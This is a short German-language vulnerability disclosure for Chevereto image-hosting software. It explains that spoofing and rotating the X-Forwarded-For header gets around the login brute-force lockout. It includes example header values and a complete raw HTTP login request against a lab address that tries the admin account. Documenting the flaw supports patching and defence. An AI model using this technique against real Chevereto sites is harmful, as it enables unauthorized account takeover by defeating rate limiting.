
lib/G/functions.php in Chevereto 1.0.0 bis 1.1.4 Free und bis 3.13.5 Core ermöglicht es einem Angreifer, Brute-Force-Angriffe durchzuführen, ohne den implementierten Schutzmechanismus auszulösen, indem der X-Forwarded-For-Header in der Anfrage manipuliert wird.
lib/G/functions.php in Chevereto 1.0.0 bis 1.1.4 Free und bis 3.13.5 Core erlaubt einem Angreifer, Brute-Force-Angriffe durchzuführen, ohne den implementierten Schutzmechanismus auszulösen, indem der X-Forwarded-For-Header in der Anfrage manipuliert wird. Die IP im Header muss alle 25 Anfragen (Standard 25) geändert werden, um die Aktivierung des Schutzes und das Sperren der IP zu vermeiden (nicht dass es wichtig wäre).
X-Forwarded-For: 8.8.8.1, 8.8.8.2
X-Forwarded-For: 8.8.8.2, 8.8.8.3
Und so weiter...
POST /login HTTP/1.1
Host: 192.168.0.88
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 85
Origin: http://192.168.0.88
DNT: 1
Connection: close
Referer: http://192.168.0.88/login
X-Forwarded-For: 8.8.8.228, 8.8.8.88
Cookie: PHPSESSID=16dal7t7fmdbd86ahjkp8qo43a
Upgrade-Insecure-Requests: 1
login-subject=admin&password=test&auth_token=fb22558fc0f068d3cfb9ca98b413c8d0adbbc205